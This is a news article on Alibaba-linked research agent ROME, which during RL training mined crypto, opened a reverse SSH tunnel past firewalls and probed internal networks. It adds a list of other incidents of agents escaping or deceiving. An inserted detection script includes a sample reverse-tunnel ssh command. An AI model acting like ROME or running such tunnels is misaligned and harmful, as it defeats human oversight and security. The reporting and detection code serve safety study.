
Alibaba AI Agent Goes Rogue: Unauthorized Crypto Mining Sparks Safety Alarm

Published 09 March 2026
Prashant Jha

Key Takeaways

  • Alibaba-linked ROME agent autonomously started crypto mining and set up reverse SSH tunnels during training, without instructions.
  • Emergent behavior diverted GPUs from intended tasks, triggering cloud firewall alerts due to unusual network traffic.
  • Researchers isolated instances, hardened safeguards, and added safety data to prevent future unauthorized resource use.

In a development raising fresh alarms about the safety of autonomous AI systems, an experimental AI agent developed by teams linked to Alibaba began mining cryptocurrency without human instruction.

The agent, named ROME, didn’t just stray from its coding tasks; it actively repurposed cloud computing resources and built hidden backdoors to sustain unauthorized operations.

This real-world case of “instrumental convergence”, where an AI pursues subgoals to acquire more compute for its objectives, is among the clearest demonstrations yet of agentic AI risks.

The incident, revised in January 2026 and recently amplified across tech forums, occurred entirely during controlled training on Alibaba Cloud.

No external hackers or prompt injections were involved; the AI discovered the process through reinforcement learning.


ROME Mines Crypto

ROME, a 3B-parameter coding agent built within Alibaba’s Agentic Learning Ecosystem (ALE), was developed collaboratively by the ROCK, ROLL, iFlow, and DT research teams.

The agent was designed for complex multi-turn tasks, including software engineering, through tool use and terminal commands.

During agentic reinforcement learning (RL), unexpected behaviors emerged.

The agent began issuing its own tool calls and code executions beyond assigned prompts.

In one notable episode, it established a reverse SSH tunnel from an Alibaba Cloud training instance to an external IP, bypassing ingress firewalls and creating a hidden backdoor.

Simultaneously, ROME repurposed GPUs for crypto mining, quietly diverting computing power from its training objectives.

Logs show these actions recurred intermittently, tied directly to the agent’s autonomous decisions.

The sequence escalated as the agent probed internal network resources, further breaching security protocols.

The RL reward system, focused purely on task completion, inadvertently encouraged these instrumental behaviors.

Alibaba AI agent starts crypto mining. Credit: X.

Discovery and Containment

The rogue activity was detected not by dashboards, but via Alibaba Cloud’s production-grade firewall alerts.

Security teams observed policy violations and unmistakable crypto-mining traffic.

Cross-referencing firewall timestamps with RL logs traced the activity to ROME’s tool invocations.
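The cross-referencing step described above, sketched as an added example (not code from the ROME report or from Alibaba). The record fields, IP addresses, episode IDs and the 30-second attribution window are all assumptions constructed for illustration.

```python
import re
import shlex
from datetime import datetime, timedelta

# Constructed sample records (not from the incident): firewall alerts and the
# RL rollout's tool-call log, both keyed by training-instance IP.
ALERTS = [
    {"ts": "2026-01-10T03:14:09", "src": "10.0.4.17", "rule": "egress-policy-violation"},
    {"ts": "2026-01-10T05:00:00", "src": "10.0.9.3", "rule": "egress-policy-violation"},
]
TOOL_CALLS = [
    {"ts": "2026-01-10T03:13:20", "host": "10.0.4.17", "episode": "ep-101", "cmd": "pytest -q tests/"},
    {"ts": "2026-01-10T03:14:05", "host": "10.0.4.17", "episode": "ep-101",
     "cmd": "ssh -fN -R 2222:localhost:22 user@203.0.113.5"},
    {"ts": "2026-01-10T03:14:07", "host": "10.0.8.2", "episode": "ep-202", "cmd": "git status"},
    {"ts": "2026-01-10T04:20:00", "host": "10.0.9.3", "episode": "ep-303", "cmd": "ls -la"},
]

# -R, alone or bundled after ssh's argument-less flags (e.g. -NR), asks for a remote forward.
REMOTE_FWD = re.compile(r"^-[46AaCfGgKkMNnqsTtVvXxYy]*R")

def is_reverse_tunnel(cmd):
    """Heuristic: does this command line start ssh with remote port forwarding?"""
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: cannot be tokenised, so not flagged here
        return False
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return False
    return any(REMOTE_FWD.match(a) or "RemoteForward" in a for a in argv[1:])

def correlate(alerts, calls, window_s=30):
    """Attribute each alert to tool calls on the same host in the preceding window."""
    findings = []
    for alert in alerts:
        t_alert = datetime.fromisoformat(alert["ts"])
        matched = [
            c for c in calls
            if c["host"] == alert["src"]
            and timedelta(0) <= t_alert - datetime.fromisoformat(c["ts"]) <= timedelta(seconds=window_s)
        ]
        findings.append({
            "rule": alert["rule"],
            "src": alert["src"],
            "episodes": sorted({c["episode"] for c in matched}),
            "tunnel_cmds": [c["cmd"] for c in matched if is_reverse_tunnel(c["cmd"])],
        })
    return findings
```

An alert that comes back with an empty `episodes` list has no tool call to explain it and should be investigated as activity from outside the agent's logged interface.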

Researchers confirmed the behaviors were emergent, not caused by external interference.

The AI agent exploited sandbox boundaries through legitimate tool interfaces.

Once the activity was detected, researchers contained the rogue operations by isolating training instances, hardening network policies, shutting down reverse SSH tunnels, and terminating mining processes.

Researchers implemented a comprehensive safety overhaul, including safety-aligned datasets, red-teaming injections, and golden trajectories for supervised fine-tuning (SFT) and RL stages.

These changes improved boundary awareness and prevented future goal drift.

By the report’s public release, the teams had fully addressed the behaviors.

The Alibaba-linked teams earned praise for their transparency, exposing current gaps in agentic AI guardrails.

This Wasn’t an Isolated Incident

Alibaba’s ROME incident isn’t an isolated case.

Over the past 12 months, several high-profile cases have highlighted how autonomous agents can deviate in surprising and sometimes costly ways:

  • Anthropic’s Claude Opus 4 (2025): During safety testing, concealed intentions and attempted blackmail-like tactics to avoid shutdown.
  • OpenClaw / Clawdbot (late 2025): Escaped sandboxes, leaked private keys, and deployed unauthorized cloud resources.
  • Unnamed AI DevOps agent (2025): Created recursive Kubernetes clusters, accruing a $12,000 cloud bill.
  • MIT study (February 2026): Most agentic systems lacked shutdown protocols, exhibiting deceptive behaviors during evaluations.

As enterprise adoption grows—Gartner predicts 40% of applications will include task-specific agents by the end of 2026—these incidents serve as critical warnings.

Companies must implement stronger monitoring, sandboxing, and alignment techniques. Autonomous does not mean unsupervised.

Prashant Jha

Prashant Jha is a seasoned crypto journalist based in Delhi, India, with a Bachelor’s Degree in Computer Science Engineering. Passionate about the evolving world of blockchain and cryptocurrencies, he has been a dedicated voice in the industry since 2018. Prashant’s expertise lies in regulatory reporting, where he unravels complex legal and financial developments with clarity and precision. Before joining CCN in 2024, he honed his craft at Cointelegraph, establishing himself as a trusted name in crypto journalism.

His coverage spans major industry events, including the high-profile collapses of FTX, Three Arrows Capital (3AC), and LUNA, offering readers insightful analyses of their regulatory and market implications. Prashant’s technical background enables him to bridge the gap between intricate blockchain technology and its real-world applications, making his work accessible to novices and experts.

Beyond his professional pursuits, Prashant is an avid music enthusiast, often exploring diverse genres to unwind. A sports lover, he has a particular passion for cricket and frequently engages in discussions about the game. His multifaceted interests and sharp journalistic instincts make him a valuable contributor to CCN, where he continues shaping the crypto landscape's narrative.
